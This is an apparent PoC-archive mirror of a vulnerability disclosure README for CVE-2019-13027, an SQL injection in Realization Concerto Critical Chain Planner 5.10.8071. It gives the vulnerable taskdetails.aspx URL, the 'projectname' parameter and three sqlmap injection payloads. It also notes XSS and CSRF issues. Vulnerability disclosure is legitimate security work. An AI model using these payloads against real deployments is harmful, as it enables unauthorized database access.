目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2019-13027 PoC — Realization Concerto Critical Chain Planner SQL注入漏洞

来源
https://github.com/IckoGZ/CVE-2019-13027
关联漏洞
标题:Realization Concerto Critical Chain Planner SQL注入漏洞 (CVE-2019-13027)
Description:Realization Concerto Critical Chain Planner(CCPM)是一套项目管理软件。 Realization CCPM 5.10.8071版本中的taskupdt/taskdetails.aspx网页存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
Description
Details for disclosing CVE-2019-13027
介绍
# CVE-2019-13027
Details for disclosing CVE-2019-13027

Vendor contact timeline:
1st July 2019 -> No response, no email back.

4th July 2019 -> No response, no email back.

8th July 2019 -> Email sent, Github created.

11 July 2019 -> No Vendor response. Vuln disclosed.


> [Vulnerability Type]
> SQL Injection
> [Affected Product Code Base]
> CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Other versions on 5.x branch are probably affected. Cannot test with >other branchs)
> ------------------------------------------
> 
> [Affected Component]
> Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has some critical security Issues, being
> SQL Injection in at least in  taskupdt/taskdetails.aspx webpage via the "projectname" parameter
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> 
> [Attack Vectors]
> Application has a lot of reflected XSS/CSRF (for example, in checklist/checklist) , but the tricky part is the SQL Injections. Some tampering is needed depending on SQL Server versión and/or IDS/IPS. 
>
> 
>URL:
> https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
> 
> ProjectName (foo) must exist and be valid. Fuzz the rest of parameters (or use a real request).
>foo has also an XSS 
>
>Detected SQL (payloads From SQLMAP)
> Parameter: projectname (GET)
>   
> 
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries (comment)
>     Payload: projectname=foo';WAITFOR DELAY '0:0:5'--
> 
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: projectname=foo' AND 3676=3676-- 
>
>     Type: time-based blind
>     Title: Microsoft SQL Server/Sybase time-based blind (IF)
>     Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 
> 
>
> 
> 
> [Vendor of Product]
> REALIZATION - https://www.realization.com/
文件快照

 [4.0K]  /data/pocs/3908ad9007409809f16cec536c8ddf4ee0042b0b
└── [1.9K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。